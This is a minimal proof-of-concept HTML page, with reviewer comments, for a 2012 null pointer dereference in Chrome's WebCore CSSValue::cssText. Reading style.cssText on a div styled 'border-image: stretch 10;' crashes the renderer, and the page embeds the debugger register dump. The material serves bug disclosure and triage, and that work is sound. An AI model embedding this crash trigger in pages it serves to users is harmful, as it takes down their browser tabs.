  <!--
  Minimal reproduction page for a null pointer dereference in the Chrome
  renderer, at WebCore::CSSValue::cssText according to the debugger output
  embedded in the script. The page states it was tested on 21.0.1180.89 m.
  The leading "N." on each line appears to be the paste site's line
  numbering rather than part of the markup.
  -->
  1. <html>
  2. <body>
  3. <h3>chrome null ptr deref bug PoC</h3>
  4. <i>tested with 21.0.1180.89 m (latest version)</i>
  <!--
  Trigger element: its only styling is an inline border-image declaration
  that gives "stretch 10" and names no image source.
  -->
  5. <div id="a" style="border-image: stretch 10;"></div>
  <!--
  The script does one thing: it reads style.cssText on element "a", which
  asks the engine to serialise the inline declaration back to text.
  Its comment block records the fault: eax is 0 and the instruction at
  CSSValue::cssText+0x8 reads [eax+4], so the access lands on address
  0x00000004.
  NOTE(review): this looks like a read through a null object pointer at a
  small fixed offset. Nothing in the dump shows influence over the address,
  so triage it as a renderer crash (availability impact) unless the linked
  write-up shows more. Confirm.
  NOTE(review): no fixed version is stated on this page. To verify a
  patched build, load the page and check that the cssText read returns a
  string and the tab stays alive.
  -->
  6. <script>
  7. /*
  8. http://cbolat.blogspot.com/2012/09/webkit-csstext-null-ptr-deref.html
  9. 0:000> r
  10. eax=00000000 ebx=015ccfb0 ecx=00000000 edx=0014ea24 esi=01e00440 edi=01e44630
  11. eip=58fcd2a8 esp=0014e8b0 ebp=0014e8b4 iopl=0 nv up ei pl nz na po nc
  12. cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
  13. chrome_58bf0000!WebCore::CSSValue::cssText+0x8:
  14. 58fcd2a8 8b4804 mov ecx,dword ptr [eax+4] ds:002b:00000004=????????
  15. */
  16. var zz = document.getElementById('a').style.cssText;
  17. </script>
  18. </body>
  19. </html>